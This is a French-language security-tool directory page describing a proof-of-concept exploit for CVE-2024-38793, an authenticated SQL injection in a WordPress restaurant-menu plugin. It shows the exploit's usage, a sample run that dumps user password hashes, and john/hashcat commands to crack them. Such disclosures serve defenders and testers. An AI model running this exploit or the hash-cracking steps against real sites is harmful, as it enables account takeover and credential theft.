Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-38793-PoC — Code de preuve de concept pour l'exploitation de CVE-2024-38793 (Best Restaurant Menu by PriceListo <= 1.4.1 - Injection SQL authentifiée (Contributeur+)) | Kitploit
Outils/GitHubGitHub/ret2desync/cve-2024-38793-poc
Cassage de Mots de PasseAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubret2desync/cve-2024-38793-poc

CVE-2024-38793-PoC

Code de preuve de concept pour l'exploitation de CVE-2024-38793 (Best Restaurant Menu by PriceListo <= 1.4.1 - Injection SQL authentifiée (Contributeur+))

Voir le dépôt
7il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-38793-PoC

Code de preuve de concept pour l'exploitation de CVE-2024-38793 (Best Restaurant Menu by PriceListo <= 1.4.1 - Authenticated (Contributor+) SQL Injection).

Preuve de concept

Ceci est un exploit de preuve de concept pour la vulnérabilité CVE-2024-38793, une vulnérabilité d'injection SQL pour les versions du plugin WordPress Best Restaurant Menu a.k.a Great Restaurant Menu WP antérieures à 1.4.2.

La vulnérabilité survient en raison d'un manque d'assainissement des entrées sur l'argument groups lors de l'utilisation du shortcode brm_restaurant_menu.

Note : Cela nécessite les identifiants d'un utilisateur disposant d'au moins les privilèges de niveau Contributeur.

Le code tentera de récupérer les noms d'utilisateur et les hachages de mots de passe de la table des utilisateurs de WordPress.

Utilisation

root@kitploit:~
CVE-2024-38793 Exploit (Best Restaurant Menu by PriceListo Version <= 1.4.1) PoC
         Requires Contributor+ Privileges on a WordPress instance with the plugin installed
         Credit: @ret2desync
         Will attempt to create a new post, exploit the vulnerability and extract all users usernames and password hashes
         Example usage:
         python3 CVE-2024-38793.py -t "http://127.0.0.1/wordpress/" -u contributor -p password --proxy "http://127.0.0.1:8080"
usage: CVE-2024-38793.py [-h] -t TARGET -u USERNAME -p PASSWORD [--proxy PROXY] [-o OUTFILE]

Exemple d'exécution

root@kitploit:~
python3 CVE-2024-38793.py -t "http://127.0.0.1/wordpress/" -u contributor -p password      
CVE-2024-38793 Exploit (Best Restaurant Menu by PriceListo Version <= 1.4.1) PoC
         Requires Contributor+ Privileges on a WordPress instance with the plugin installed
         Credit: @ret2desync
         Will attempt to create a new post, exploit the vulnerability and extract all users usernames and password hashes
         Example usage:
         python3 CVE-2024-38793.py -t "http://127.0.0.1/wordpress/" -u contributor -p password --proxy "http://127.0.0.1:8080"
[*] Successfully signed in to Wordpress using contributor password
[*] Successfully created new post, id: 219
[*] Successfully saved new post with exploit, post id: 219
[*] Successfully grabbed usernames and password hashes
[*] Found 2 sets of credentials
[***                Credentials                ***]
root:$P$BG.b.gHI.byee9PWs8GspKxY9qp0Cm0
contributor:$P$BBVRINbQUo28Tpbp3H7/iITT/Eo9aR0
[*] Crack hashes with: 
 john <hashes_file> --wordlist=<wordlist> 
 hashcat -m 400 -a 0 --username <hashes_file> <wordlist>
[*] Exploit completed successfully
Télécharger l’outil